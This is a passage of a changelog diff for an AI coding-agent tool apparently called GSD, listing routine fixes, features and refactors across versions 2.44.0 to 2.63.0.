plan-milestone re-plan (#3318) +- reopen DB on cold resume, recognize heavy check mark (#3319) +- dashboard model label shows dispatched model, not stale previous unit (#3320) + +### Changed +- **gsd**: remove copyright line from test file +- **gsd**: trim promptGuidelines to 1 line to reduce per-turn token cost +- **web**: consolidate subprocess boilerplate 
into shared runner (#1899) + +## [2.63.0] - 2026-04-05 + +### Added +- **mcp-server**: add 6 read-only tools for project state queries (#3515) + +### Fixed +- **gsd**: enrich vague diagnostic messages with root-cause context +- **test**: reset dedup cache between ask-user-freetext tests +- **db**: delete orphaned WAL/SHM files alongside empty gsd.db (#2478) +- **gsd**: prevent auto-wrapup from interrupting in-flight tool calls (#3512) +- **gsd**: handle bare model IDs in resolveDefaultSessionModel (#3517) +- **gsd**: wrap decision and requirement saves in transaction to prevent ID races +- **gsd**: prefer PREFERENCES.md over settings.json for session bootstrap model (#3517) +- **gsd**: add Claude Code official skill directories to skill resolution +- **dedup**: hash full question payload, not just IDs +- **gsd**: prevent duplicate ask_user_questions dispatches with per-turn dedup cache +- **pi-ai**: extend repairToolJson to handle XML tags and truncated numbers +- **pi-coding-agent**: cancel stale retries after model switch + +### Changed +- untrack .repowise/ and add to .gitignore + +## [2.62.1] - 2026-04-05 + +### Fixed +- **gsd**: gate steer worktree routing on active session, fix messaging +- **gsd**: resolve steer overrides to worktree path when worktree is active + +## [2.62.0] - 2026-04-04 + +### Added +- **gsd**: enhance /gsd codebase with preferences, --collapse-threshold, and auto-init +- **01-05**: fire before_model_select hook, add verbose scoring output, load capability overrides +- **01-04**: register before_model_select placeholder handler in GSD hooks +- **01-04**: add BeforeModelSelectEvent to extension API and wire emission +- **01-03**: wire taskMetadata from selectAndApplyModel to resolveModelForComplexity +- **01-03**: insert STEP 2 capability scoring into resolveModelForComplexity +- **01-01**: add taskMetadata to ClassificationResult and export extractTaskMetadata +- **01-01**: add capability types, data tables, and scoring functions to 
model-router + +### Fixed +- **gsd**: add codebase validation in validatePreferences so preferences are not silently dropped +- **test**: update db-path-worktree-symlink test for simplified diagnostic logging +- **gsd**: update tests for errors-only audit persistence, fix empty catch blocks +- **gsd**: harden audit log persistence — errors-only, sanitized, demote probe warnings +- **gsd**: address adversarial review findings on workflow-logger migration +- **gsd**: fail-closed stop guard, harden backtrack parsing, fix prompt params +- **gsd**: add diagnostic logging to empty catch blocks in auto-mode +- **lsp**: add legacy alias for renamed kotlin-language-server key +- break infinite notes loop when selecting "None of the above" +- align defaultRoutingConfig capability_routing to true +- **pi-coding-agent**: upgrade Kotlin LSP to official Kotlin/kotlin-lsp +- **test**: use correct RequirementCounts type fields in edge case tests +- **remote-questions**: fire configured channels in interactive mode + +### Changed +- **gsd**: migrate all catch blocks to centralized workflow-logger +- init gsd + +## [2.61.0] - 2026-04-04 + +### Added +- stop/backtrack capture classifications for milestone regression (#3488) +- GSD context optimization with model routing and context masking + +## [2.60.0] - 2026-04-04 + +### Added +- add /btw skill — ephemeral side questions from conversation context + +### Fixed +- **btw**: remove LLM-specific references from skill description + +## [2.59.0] - 2026-04-03 + +### Added +- **extensions**: add Ollama extension for first-class local LLM support (#3371) +- **doctor**: stale commit safety check with gsd snapshot and auto-cleanup +- **extensions**: wire up topological sort and unified registry filtering (#3152) +- **widget**: add last commit display and dashboard layout improvements (#3226) +- **model-routing**: enable dynamic routing by default (#3120) +- **vscode**: sidebar redesign, SCM provider, checkpoints, diagnostics [3/3] +- 
**splash**: add remote channel indicator to welcome screen tools row +- stream full text and thinking output in headless verbose mode (#2934) +- **gsd**: add codebase map — structural orientation for fresh agent contexts + +### Fixed +- **worktree**: resolve merge conflict for PR #3322 — adopt comprehensive pre-merge cleanup +- **merge**: clean stale MERGE_HEAD before squash merge (#2912) +- **state**: always run disk→DB reconciliation when DB is available (#2631) +- **git-service**: fix merge-base ancestry check and .gsd/ leakage in snapshot absorption +- **extensions**: update provides.hooks in 7 extension manifests to match actual registrations (#3157) +- surface nativeCommit errors in reconcileMergeState instead of silently swallowing (#3052) +- **parallel**: scope commits to milestone boundaries in parallel mode (#3047) +- add windowsHide to all web-mode subprocess spawns (#2628) (#3046) +- skip auto-mode pause on empty-content aborted messages (#2695) (#3045) +- detect and remove nested .git dirs in worktree cleanup to prevent data loss (#3044) +- prevent data loss when git isolation default changes (#2625) (#3043) +- **read-tool**: clamp offset to file bounds instead of throwing (#3007) (#3042) +- **gsd**: preserve queued milestones with worktrees in ghost detection (#3041) +- **compaction**: add chunked fallback when messages exceed model context window (#3038) +- preserve interactive terminal across tab switches and project changes (#3055) +- call cleanupQuickBranch on turn_end to squash-merge quick branch back (#3054) +- align run-uat artifact path to ASSESSMENT, preventing false stuck retries (#3053) +- replace invalid Discord invite links with canonical URL (#3056) +- add Windows shell guard to remaining spawn sites (#3058) +- route `gsd auto` to headless runner to prevent hang on piped stdin/stdout (#3057) +- respect .gitignore for .gsd/ in rethink prompt (#3059) +- migrate unit ownership from JSON to SQLite to eliminate read-modify-write race (#3061) 
+- **roadmap**: handle numbered, bracketed, and indented prose H3 headers in slice parser (#3063) +- add worktree-merge to resolveModelWithFallbacksForUnit switch and update KNOWN_UNIT_TYPES (#3066) +- clean up MERGE_HEAD on all error paths in mergeMilestoneToMain (#2912) (#3068) +- prevent LLM from confusing background task output with user input (#3069) +- add openai-codex provider and modern OpenAI models to MODEL_CAPABILITY_TIER and cost tables (#3070) +- preserve active tab when switching projects (#3071) +- include project name in desktop notifications (#3072) +- recover from many-image dimension overflow by stripping older images (#3075) +- resolve bare model IDs to anthropic over claude-code provider (#3076) +- **auto**: move selectAndApplyModel before updateProgressWidget (#3079) +- detect project relocation and recover state without data loss (#3080) +- add free-text input to ask-user-questions when "None of the above" is selected (#3081) +- block work execution during /gsd queue mode (#2545) (#3082) +- detect worktree basePath in gsdRoot() to prevent escaping to project root (#3083) +- invalidate stale quick-task captures across milestone boundaries (#3084) +- defer model validation until after extensions register (#3089) +- repair YAML bullet lists in malformed tool-call JSON (#3090) +- unify SUMMARY.md render paths for projection fidelity (#3091) +- chat mode misrepresents terminal output, looks stuck, omits user messages (#3092) +- resolve 4 state corruption bugs in milestone/slice completion (#2945) (#3093) +- isolate guided-flow session state and key discussion milestone queries (#2985) (#3094) +- **guided-flow**: route dispatchWorkflow through dynamic routing pipeline (#3153) +- skip external state migration inside git worktrees (#2970) (#3227) +- coerce non-numeric strings in DB columns during manifest serialization (#2962) (#3229) +- route allDiscussed and zero-slices paths to queued milestone discussion (#3150) (#3230) +- use loose equality for 
null checks in secure_env_collect (#2997) (#3231) +- prevent prompt explosion from $' in template replacement values (#2968) (#3232) +- resolve OAuth API key in buildMemoryLLMCall via modelRegistry (#2959) (#3233) +- **forensics**: read completion status from DB instead of legacy file (#3129) (#3234) +- use camelCase parameter names in execute-task and complete-slice prompts (#2933) (#3236) +- check bootstrap completeness in init wizard gate, not just .gsd/ existence (#2942) (#3237) +- specify write tool for PROJECT.md in milestone/slice prompts (#3238) +- widen completing-milestone gate to accept "None required" and similar phrasings (#2931) (#3239) +- prevent ask_user_questions from poisoning auto-mode dispatch (#2936) (#3240) +- guard null s.currentUnit in runUnitPhase closeout after stopAuto race (#2939) (#3241) +- replace `web_search` with `search-the-web` in prompts and agent frontmatter (#2920) (#3245) +- preserve milestone title in upsertMilestonePlanning when DB row pre-exists (#2879) (#3247) +- invalidate stale milestone validation on roadmap reassessment (#2957) (#3242) +- **discuss**: add roadmap fallback when DB is open but empty (#2892) (#3244) +- integrate Codex & Gemini CLI into provider routes and rate-limit handling (#2922) (#3246) +- **error-classifier**: widen STREAM_RE to cover all 7 V8 JSON parse error variants (#2916) (#3243) +- prevent git stash from destroying queued milestone CONTEXT files (#2505) (#3273) +- skip staleness rebuild in npm tarball installs (#2877) (#3250) +- **parallel**: check worktree DB for milestone completion in merge (#2812) (#3256) +- make claude-code provider stateful with full context and sidechain events (#2859) (#3254) +- **worktree**: preserve non-empty gsd.db during sync to prevent truncation (#2815) (#3255) +- align @gsd/native module type with compiled output (#3253) +- parse hook/* completed-unit keys correctly in forensics + doctor (#2826) (#3252) +- copy mcp.json into auto-mode worktrees (#2791) (#3251) +- 
add gsd_requirement_save and upsert path for requirement updates (#3249) +- handle pause_turn stop reason to prevent 400 errors with native web search (#2869) (#3248) +- use authoritative milestone status in web roadmap (#2807) (#3258) +- classify long-context entitlement 429 as quota_exhausted, not rate_limit (#2803) (#3257) +- **docs**: use ~/.pi/agent/extensions/ for community extension install path (#3131) (#3259) +- add disk→DB slice reconciliation in deriveStateFromDb (#2533) (#3262) +- run forensics duplicate detection before investigation (#2704) (#3260) +- skip TUI render loop on non-TTY stdout to prevent CPU burn (#3095) (#3263) +- persist forensics report context across follow-up turns (#2941) (#3261) +- invalidate workspace state on turn_end so milestones list stays current (#2706) (#3266) +- eliminate 3 recurring doctor audit false positives (#3105) (#3264) +- **web**: reconcile auto-mode state with on-disk lock in dashboard (#2705) (#3265) +- treat ghost milestones as ineligible for parallel execution (#2501) (#3268) +- redirect auto-mode to headless when stdout is piped (#2732) (#3269) +- attempt VACUUM recovery when initSchema fails with corrupt freelist (#2519) (#3270) +- resolve db_unavailable loop in worktree/symlink layouts (#2517) (#3271) +- correct OAuth fallback request shape for google_search (#2963) (#3272) +- prevent UAT stuck-loop and orphaned worktree after milestone completion (#3065) +- **mcp**: handle server names with spaces in mcp_discover (#3037) +- **gsd**: detect markdown body verdicts and guard plan-milestone against completed slices (#2960) (#3035) +- **error-classifier**: replace STREAM_RE whack-a-mole with catch-all V8 JSON.parse pattern +- type _borderColorKey as 'dim' | 'bashMode' to match ThemeColor +- **tui**: comprehensive TUI review — layout, flow, rendering, and state fixes +- **gsd**: harden codebase-map — bug fixes, UX polish, and expanded tests + +### Changed +- **state**: centralize pipeline logging through 
workflow logger (#3282) +- **gitignore**: exclude src/ build artifacts, scratch files, and .plans/ +- **complexity**: reclassify planning phases from standard to heavy tier + +## [2.58.0] - 2026-03-28 + +### Added +- Added 6 discord.js shard/error/warn event listeners for reconnect… + +### Fixed +- **auto**: guard startAuto() against concurrent invocation (#2923) +- **auto-dispatch**: widen operational verification gate regex (fixes #2866) (#2898) +- **parallel**: three bugs preventing reliable parallel worker execution (#2801) +- **web**: fall back to project totals when dashboard metrics are zero (#2847) +- **gsd**: parse raw YAML under preference headings (#2794) +- **gsd**: persist verification classes in milestone validation (#2820) +- **gsd**: guard reconcileWorktreeDb against same-file ATTACH corruption (#2825) +- **web**: skip shutdown in daemon mode so server survives tab close (#2842) +- **headless**: skip execution_complete for multi-turn commands (auto/next) +- Fixed 3 bugs (launchd JSON parsing, login race condition, interact… + +## [2.57.0] - 2026-03-28 + +### Added +- Extended DaemonConfig with control_channel_id and orchestrator se… +- Created pure-function event formatters (10 functions) mapping RPC… +- **models**: add GLM-5.1 to Z.AI provider in custom models +- Added discord.js v14, DiscordBot class with auth guard and lifecy… +- Created packages/daemon workspace package with DaemonConfig/LogLe… +- headless text mode shows tool calls + skip UAT pause in headless +- Wire --resume flag to resolve session IDs via prefix matching and… +- Migrated headless orchestrator to use execution_complete events,… + +### Fixed +- **headless**: match "completed" status from RPC v2 in exit code mapper +- show external drives in directory browser on Linux +- Regenerate package-lock.json after merge +- **gsd**: resume cold auto bootstrap from db +- **gsd**: preserve first auto unit model after session reset +- Accept flags after positional command in headless arg 
parser +- **gsd**: discover project subagents in .gsd +- **model-routing**: use honest unitTypes for discuss dispatches and map all auto-dispatch phases +- revert jsonl.ts to inline implementation — @gsd-build/rpc-client not available at source-level test time in CI + +### Changed +- auto-commit after complete-milestone + +## [2.56.0] - 2026-03-27 + +### Added +- **parallel**: /gsd parallel watch — native TUI overlay for worker monitoring (#2806) + +### Fixed +- **ci**: copy web/components to dist-test for xterm-theme test (#2891) +- **gsd**: prefer PREFERENCES.md in worktrees (#2796) +- **gsd**: resume auto-mode after transient provider pause (#2822) +- **parallel**: resolve session lock contention and 3 related parallel-mode bugs (#2184) (#2800) +- **web**: improve light theme terminal contrast (#2819) +- **gsd**: preserve auto start model through discuss (#2837) + +### Changed +- **test**: compile unit tests with esbuild, reclassify integration tests, fix node_modules symlink (#2809) + +## [2.55.0] - 2026-03-27 + +### Added +- colorized headless verbose output with thinking, phases, cost, and durations (#2886) +- headless text mode observability + skip UAT pause (#2867) + +### Fixed +- **cli**: let gsd update bypass version mismatch gate (#2845) +- **contracts**: add isWorkspaceEvent guard + close routeLiveInteractionEvent exhaustiveness gap (#2878) +- **gsd**: use project root for prior-slice dispatch guard (#2863) +- **gsd**: include queue context in milestone planning prompts (#2846) +- detect monorepo roots in project discovery to prevent workspace fragmentation (#2849) +- **bg-shell**: recover from deleted cwd in timers (#2850) +- **gsd**: enable dynamic routing without models section (#2851) +- **interactive**: fully remove providers from /providers (#2852) + +## [2.54.0] - 2026-03-27 + +### Added +- Headless Integration Hardening & Release (M002) (#2811) +- **parallel**: add real-time TUI monitor dashboard with self-healing (#2799) + +## [2.53.0] - 
2026-03-27 + +### Added +- **vscode**: activity feed, workflow controls, session forking, enhanced code lens [2/3] (#2656) +- **gsd**: enable safety mechanisms by default (snapshots, pre-merge checks) (#2678) + +### Fixed +- hydrate collected secrets for current session (#2788) +- resolve stash pop conflicts and stop swallowing merge errors (#2780) +- treat any extracted verdict as terminal in isValidationTerminal (#2774) +- use localStorage for auth token to enable multi-tab usage (#2785) +- guard activeMilestone.id access in discuss and headless paths (#2776) +- clean up zombie parallel workers stuck in error state (#2782) +- relax milestone validation gate to accept prose evidence (#2779) +- write milestone reports to project root instead of worktree (#2778) +- auto-resolve build artifact conflicts in milestone merge (#2777) +- let rate-limit errors attempt model fallback before pausing (#2775) +- prevent gsd next from self-killing via stale crash lock (#2784) +- add shell flag for Windows spawn in VSCode extension (#2781) + +### Changed +- **gsd**: extract duplicated status guards and validation helpers (#2767) + +## [2.52.0] - 2026-03-27 + +### Added +- **vscode**: status bar, file decorations, bash terminal, session tree, conversation history, code lens [1/2] (#2651) +- **web**: Dark mode contrast — raise token floor and flatten opacity tier system (#2734) +- Wire --bare mode across headless → pi-coding-agent → resource-loa… +- Added runId generation on prompt/steer/follow_up commands, event… +- Added RPC protocol v2 types, init handshake with version detectio… + +### Fixed +- auto-mode stops after provider errors (#2762) (#2764) +- add missing runtime stage name to Dockerfile (#2765) +- make transaction() re-entrant and add slice_dependencies to initSchema +- remove preferences.md from ROOT_STATE_FILES to prevent back-sync overwrite +- wire tool handlers through DB port layer, remove _getAdapter from all tools +- **gsd**: move state machine guards inside 
transaction in 5 tool handlers (#2752) +- reconcile disk milestones into empty DB before deriveStateFromDb guard (#2686) +- **gsd**: seed preferences.md into auto-mode worktrees (#2693) +- **claude-import**: discover marketplace plugins nested inside container directories (#2718) +- exempt interactive tools from idle watchdog stall detection (#2676) +- guard allSlicesDone against vacuous truth on empty slice array (#2679) +- block complete-milestone dispatch when VALIDATION is needs-remediation (#2682) +- **gsd**: sync milestone DB status in parkMilestone and unparkMilestone (#2696) +- **web**: auth token gate — synthetic 401 on missing token, unauthenticated boot state, and recovery screen (#2740) +- **remote-questions**: empty-key entry in auth.json shadows valid Discord bot token (#2737) +- idle watchdog stalled-tool detection overridden by filesystem activity (#2697) +- surface exhausted Claude SDK streams as errors (#2719) +- **docker**: overhaul fragile setup, adopt proven container patterns (#2716) +- **gsd**: write DB before disk in validate-milestone to match engine pattern (#2742) +- **gsd**: extract and honor milestone argument in /gsd auto and /gsd next (#2729) +- **windows**: prevent EINVAL by disabling detached process groups on Win32 (#2744) +- **gsd**: delete orphaned verification_evidence rows on complete-task rollback (#2746) +- **gsd**: wire setLogBasePath into engine init to resurrect audit log (#2745) +- Remove premature pendingTools.delete in webSearchResult handler (#2743) +- **gsd**: remove redundant assertions that fail TS2367 typecheck +- include preferences.md in worktree sync and initial seed + +### Changed +- **pi-ai**: replace model-ID pattern matching with capability metadata (#2548) +- **gsd-db**: comprehensive SQLite audit fixes — indexes, caching, safety, reconciliation +- rename preferences.md to PREFERENCES.md for consistency (#2700) (#2738) +- **gsd**: unify three overlapping error classifiers into single classify→decide→act 
pipeline + +## [2.51.0] - 2026-03-26 + +### Added +- add /terminal slash command for direct shell execution (#2349) +- **auto**: check verification class compliance before milestone completion (#2623) +- **validate**: extract followUps and knownLimitations in parseSummary (#2622) +- managed RTK integration with opt-in preference and web UI toggle (#2620) +- **validate**: inject verification classes into milestone validation prompt (#2621) +- **skills**: add 19 wshobson/agents packs with 40 curated skills +- **skills**: add 11 new skill packs covering major frameworks and languages +- **skills**: add SQLite/SQL detection, SQL optimization pack, and Redis pack +- **skills**: add Prisma and Supabase/Postgres database packs +- **skills**: add cloud platform packs (Firebase, Azure, AWS) and improve detection +- **skills**: curate catalog — add top ecosystem skills, drop low-quality bundled ones +- **skills**: parse SDKROOT from pbxproj for platform-aware iOS skill matching +- **skills**: use ~/.agents/skills/ as primary skills directory with curated catalog + +### Fixed +- improve light theme warning contrast (#2674) +- honor explicit model config when model is not in known tier map (#2643) +- exclude lastReasoning from retry diagnostic to prevent hallucination loops (#2663) +- persist rewrite-docs attempt counter to disk for session restart survival (#2671) +- add non-null assertions for parseUnitId optional fields in tests +- update triage-dispatch static analysis tests for enqueueSidecar helper +- **notifications**: prefer terminal-notifier over osascript on macOS (#2633) +- classify stream-truncation JSON parse errors as transient (#2636) +- call ensureDbOpen() before slice queries in /gsd discuss (#2640) +- **prompts**: use --body-file for forensics issue creation (#2641) +- isLockProcessAlive should return true for own PID (#2642) +- check ASSESSMENT file for UAT verdict in checkNeedsRunUat (#2646) +- use pauseAuto instead of stopAuto for warning-level dispatch 
stops (#2666) +- signal malformed tool arguments in toolcall_end event (#2647) +- prevent double mergeAndExit on milestone completion (#2648) +- respect queue-order.json in DB-backed state derivation (#2649) +- **vscode**: support Remote SSH by adding extensionKind and error handler (#2650) +- update DB task status in writeBlockerPlaceholder for execute-task (#2657) +- normalize path separators in matchesProjectFileMarker for Windows +- **tests**: remove obsolete doctor filesystem test +- **tests**: update doctor issue code to db_done_task_no_summary +- restore PR files lost during merge conflict resolution +- **skills**: address QA round 3 +- **skills**: address QA round 2 +- **skills**: address QA round 1 +- **skills**: prioritize ecosystem dir and skip legacy after migration +- **skills**: address QA round 23 +- **skills**: address QA round 22 +- **skills**: address QA round 21 +- **skills**: address QA round 20 +- **skills**: address QA round 19 +- **skills**: address QA round 18 +- **skills**: address QA round 17 +- **skills**: address QA round 16 +- **skills**: address QA round 15 +- **skills**: address QA round 14 +- **skills**: address QA round 13 +- **skills**: address QA round 12 +- **skills**: address QA round 11 +- **skills**: address QA round 10 +- **skills**: address QA round 8 +- **skills**: detect FastAPI via dependency scanning +- **skills**: address QA round 6 +- **skills**: address QA round 5 +- **skills**: address QA round 4 +- **skills**: address QA round 3 +- **skills**: address QA round 2 +- **skills**: defer greenfield skill selection to post-design phase +- **skills**: add migration from ~/.gsd/agent/skills/ to ~/.agents/skills/ +- **gsd extension**: detect initialized projects in health widget +- **gsd extension**: detect initialized projects in health widget + +### Changed +- consolidate docs, remove stale artifacts, and repo hygiene (#2665) +- extract runSafely helper for try-catch-debug-continue pattern (#2611) + +## [2.50.0] - 
2026-03-26 + +### Added +- **gsd**: wire structured error propagation through UnitResult +- add parallel quality gate evaluation with evaluating-gates phase +- add 8-question quality gates to planning and completion templates + +### Fixed +- reconcile stale task status in filesystem-based state derivation (#2514) +- merge duplicate extractUatType imports in auto-dispatch +- use Record for hasNonEmptyFields to accept typed DB rows +- **tests**: replace undefined assertTrue/assertEq with assert.ok/assert.equal +- **tests**: replace undefined assertTrue/assertEq with assert.ok/deepStrictEqual +- **gsd**: handle session_switch event so /resume restores GSD state (#2587) +- use GitHub Issue Types via GraphQL instead of classification labels +- **headless**: disable overall timeout for auto-mode, fix lock-guard auto-select (#2586) +- **auto**: align UAT artifact suffix with gsd_slice_complete output (#2592) +- **retry-handler**: stop treating 5xx server errors as credential-level failures +- **test**: replace stale completedUnits with sessionFile in session-lock test +- **session-lock**: retry lock file reads before declaring compromise +- **gsd**: prevent ensureGsdSymlink from creating subdirectory .gsd when git-root .gsd exists +- **auto**: add EAGAIN to INFRA_ERROR_CODES to stop budget-burning retries +- **search**: enforce hard search budget and survive context compaction +- **remote-questions**: use static ESM import for AuthStorage hydration +- add SAFE_SKILL_NAME guard to reject prompt-injection via crafted skill names +- **gsd**: use explicit parameter syntax in skill activation prompts +- guard writeIntegrationBranch against workflow-template branches +- preserve doctor missing-dir checks for active legacy slices +- **gsd**: downgrade isolation mode when worktree creation fails +- **gsd**: skip loading files for completed milestones in queue context builder +- resolve race conditions in blob-store, discovery-cache, and agent-loop +- **ai**: resolve WebSocket 
listener leaks and bound session cache +- **rpc**: resolve double-set race, missing error ID, and stream handler +- **pi-coding-agent**: prevent crash when login is cancelled +- **doctor**: compare lockfile mtime against install marker, not directory mtime (#1974) +- **doctor**: chdir out of orphaned worktree before removal (#1946) +- **roadmap**: recognize '## Slice Roadmap' header in extractSlicesSection +- prevent worktree sync from overwriting state and forward-sync completed-units.json +- **web**: lazily compute default package root to avoid Windows standalone crash + +### Changed +- adopt parseUnitId utility across all auto-* modules +- flatten syncMilestoneDir nesting with shared helper +- extract merge-state cleanup helper in reconcileMergeState +- extract planning-state validation helpers in detectRogueFileWrites +- split doctor-checks into focused modules +- merge auto-worktree-sync into auto-worktree +- deduplicate artifact path functions into single module +- remove dead selfHealRuntimeRecords function from auto-recovery +- decouple session-forensics from auto-worktree +- remove dead worktree code and unused methods +- consolidate branch name patterns into single module +- deduplicate session-lock compromise handler and state assignment + +## [2.49.0] - 2026-03-25 + +### Added +- add --yolo flag to /gsd auto for non-interactive project init + +### Fixed +- use full git log in merge tests to match trailer-based milestone IDs +- update parallel-merge test assertion for new trailer format +- clarify regex alternation in test assertion +- verdict gate accepts PARTIAL for mixed/human-experience/live-runtime UATs + +### Changed +- move GSD metadata from commit subject scopes to git trailers + +## [2.48.0] - 2026-03-25 + +### Added +- **discuss**: allow /gsd discuss to target queued milestones +- enhance /gsd forensics with journal and activity log awareness + +### Fixed +- make journal scanning intelligent — limit parsed files, line-count older ones +- 
**model-registry**: scope custom provider stream handlers to prevent clobbering built-in API handlers +- **forensics**: filter benign bash exit-code-1 and user skips from error traces +- **gsd**: clear stale milestone ID reservations at session start +- render tool calls above text response for external providers +- **auto**: skip CONTEXT-DRAFT warning for completed/parked milestones + +### Changed +- address review - extract RAPID_ITERATION_THRESHOLD_MS, simplify data access + +### Removed +- remove insertChildBefore usage in chat-controller + +## [2.47.0] - 2026-03-25 + +### Added +- **agent-core**: add externalToolExecution mode for external providers +- **provider**: add Claude Code CLI provider extension + +### Fixed +- **claude-code-cli**: render tool calls above text response +- **ci**: update FILE-SYSTEM-MAP.md path after docs→docs-internal move +- isInheritedRepo false negative when parent has stale .gsd; defense-in-depth local .git check in bootstrap +- **claude-code-cli**: resolve SDK executable path and update model IDs +- make planning doctrine demoable definition audience-appropriate +- **prompts**: migrate remaining 4 prompts to use DB-backed tool API instead of direct write +- make workflow event hash platform-deterministic +- reconcile stale task DB status from disk artifacts (#2514) + +## [2.46.1] - 2026-03-25 + +### Fixed +- **ci**: prevent windows-portability from blocking pipeline +- **ci**: prevent pipeline race condition on release push +- **gsd**: create empty DB for fresh projects with empty .gsd/ (#2510) +- **remote-questions**: hydrate remote channel tokens from auth.json on startup + +### Changed +- trigger CI to pick up pipeline race condition fix +- trigger pipeline with race condition fix + +## [2.46.0] - 2026-03-25 + +### Added +- **gsd**: single-writer engine v3 — state machine guards, actor identity, reversibility +- **gsd**: single-writer state engine v2 — discipline layer on DB architecture +- **gsd**: add workflow-logger and 
wire into engine, tool, manifest, reconcile paths (#2494) + +### Fixed +- **gsd**: align prompts with single-writer tool API +- **gsd**: integration-proof — check DB state not roadmap projection after reset +- **gsd**: block milestone completion when verification fails (#2500) +- **ci**: add typecheck:extensions to pretest to prevent silent type drift +- **gsd**: relax integration-proof cross-validation for table-format roadmap +- **gsd**: update integration-proof tests for table-format roadmap projections +- **gsd**: update test assertions for schema v11, prompt changes, and removed completedUnits +- **gsd**: update test files for removed completedUnits, writeLock signature, and type changes +- **gsd**: remove stale completedUnits refs, fix writeLock callers, add missing imports +- **gsd**: harden single-writer engine — close TOCTOU, intercept bypasses, status inconsistencies +- **write-intercept**: close bare-relative-path bypass in STATE.md regex +- **voice**: fix misleading portaudio error on PEP 668 Linux systems (#2403) (#2407) +- **core**: address PR review feedback for non-apikey provider support (#2452) +- **ci**: retry npm install in pipeline to handle registry propagation delay (#2462) +- **gsd**: change default isolation mode from worktree to none (#2481) +- **loader**: add startup checks for Node version and git availability (#2463) +- **gsd**: add worktree lifecycle events to journal (#2486) + +## [2.45.0] - 2026-03-25 + +### Added +- **web**: make web UI mobile responsive (#2354) +- **gsd**: add `/gsd rethink` command for conversational project reorganization (#2459) +- **gsd**: add renderCall/renderResult previews to DB tools (#2273) +- add timestamps on user and assistant messages (#2368) +- **gsd**: add `/gsd mcp` command for MCP server status and connectivity (#2362) +- complete offline mode support (#2429) +- **system-context**: inject global ~/.gsd/agent/KNOWLEDGE.md into system prompt (#2331) + +### Fixed +- **gsd**: handle retentionDays=0 on 
Windows + run windows-portability on PRs (#2460) +- use Array.from instead of Buffer.from for native processStreamChunk state (#2348) +- **gsd**: isInheritedRepo conflates ~/.gsd with project .gsd when git root is $HOME (#2398) +- reconcile disk milestones missing from DB in deriveStateFromDb (#2416) (#2422) +- **auto**: reset recoveryAttempts on unit re-dispatch (#2322) (#2424) +- detect and preserve submodule state during worktree teardown (#2337) (#2425) +- **auto-start**: handle survivor branch recovery in phase=complete (#2358) (#2427) +- **gsd**: widen test search window for CRLF portability on Windows (#2458) +- **gsd**: preserve rich task plans on DB roundtrip (#2450) (#2453) +- merge worktree back to main when stopAuto is called after milestone completion (#2317) (#2430) +- **gsd**: skip doctor directory checks for pending slices (#2446) +- **gsd**: migrate completion/validation prompts to DB-backed tools (#2449) +- **gsd**: prevent saveArtifactToDb from overwriting larger files with truncated content (#2442) (#2447) +- stop auto loop on real code merge conflicts (#2330) (#2428) +- classify terminated/connection errors as transient in provider error handler (#2309) (#2432) +- archive completed-units.json on milestone transition and sync metrics.json (#2313) (#2431) +- supervision timeouts now respect task est: annotations (#2243) (#2434) +- auto_pr: true now actually creates PRs — fix 3 interacting bugs (#2302) (#2433) +- **gsd**: insert DB row when generating milestone ID (#2416) +- **gsd**: reconcile disk-only milestones into DB in deriveStateFromDb (#2416) +- **preferences**: deduplicate unrecognized format warning on repeated loads (#2375) +- gate auto-mode bootstrap on SQLite availability (#2419) (#2421) +- block /gsd quick when auto-mode is active (#2420) +- **ci**: add Rust target for all platforms, not just cross-compilation +- **ci**: restore Rust target triple and separate cross-compilation setup +- **ci**: separate cross-compilation target from 
toolchain install + +### Changed +- migrate D-G test files from createTestContext to node:test (#2418) +- **test**: replace try/finally with beforeEach/afterEach in packages tests (#2390) +- **test**: migrate gsd/tests s-z from custom harness to node:test (#2397) +- **test**: migrate gsd/tests o-r from custom harness to node:test (#2401) +- **test**: migrate gsd/tests i-n from custom harness to node:test (#2399) +- **test**: migrate gsd/tests a-c from custom harness to node:test (#2400) +- **test**: replace try/finally with t.after() in gsd/tests (e-i) (#2396) +- **test**: replace try/finally with t.after() in gsd/tests (a-d) (#2395) +- **test**: replace try/finally with t.after() in src/tests (o-z) (#2392) +- **test**: replace try/finally with t.after() in src/tests (a-n) (#2394) + +## [2.44.0] - 2026-03-24 + +### Added +- **core**: support for 'non-api-key' provider extensions like Claude Code CLI (#2382) +- **docker**: add official Docker sandbox template for isolated GSD auto mode (#2360) +- **gsd**: show per-prompt token cost in footer behind show_token_cost preference (#2357) +- **web**: add "Change project root" button to web UI (#2355) +- **gsd**: Tool-driven write-side state transitions — replace markdown mutation with atomic SQLite tool calls (#2141) +- **S06/T02**: Strip all 16 lazy createRequire fallback paths from migr… +- **S05/T04**: Migrate remaining 6 callers (auto-prompts, auto-recovery… +- **S05/T03**: Migrate 7 warm/cold callers (doctor, doctor-checks, visu… +- **S05/T02**: Extend migrateHierarchyToDb to populate v8 planning colu… +- **S05/T01**: Schema v10 adds replan_triggered_at column; deriveStateF… +- **S04/T03**: Migrate auto-dispatch.ts (3 rules), auto-verification.ts… +- **S04/T02**: Migrate dispatch-guard.ts to DB queries with isDbAvailab… +- **S01/T03**: Migrate planning prompts to DB-backed tool guidance and… +- **S01/T01**: Partially advanced schema v8 groundwork and documented t… +- **gsd**: tool-driven write-side state transitions 
(M001) + +### Fixed +- post-migration cleanup — pragmas, rollbacks, tool gaps, stale code (#2410) +- **test**: normalize CRLF in auto-stash-merge assertion for Windows +- **test**: swallow EPERM on Windows temp dir cleanup in auto-stash-merge test +- **gsd**: add file-based fallbacks for DB-dependent code paths and fix CI test failures +- **gsd**: remove stale observabilityIssues reference in journal-integration test +- **extensions**: detect TypeScript syntax in .js extension files and suggest renaming to .ts (#2386) +- **gsd**: prevent planning data loss from destructive upsert and post-unit re-import (#2370) +- **gsd**: use correct notify severity type ("warning" not "warn") +- **web**: resolve compiled .js modules for all subprocess calls under node_modules (#2320) +- **test**: increase perf assertion threshold to prevent CI flake (#2327) +- add missing SQLite WAL sidecars and journal to runtime exclusion lists (#2299) +- **gsd**: remove stale observability validator + fix greenfield worktree check +- **memory**: fix memory and resource leaks across TUI, LSP, DB, and automation (#2314) +- **gsd**: preserve freeform DECISIONS.md content on decision save (#2319) +- **pi-ai**: restore alibaba-coding-plan provider via models.custom.ts (#2350) +- **doctor**: skip false env_dependencies error in auto-worktrees (#2318) +- **gsd**: auto-stash dirty files before squash merge and surface dirty filenames in error (#2298) +- **gsd**: keep params as any in db-tools executors (CI tsconfig is stricter) +- **gsd**: replace any types in db-tools executor signatures +- **gsd**: resolve 4 TS compilation 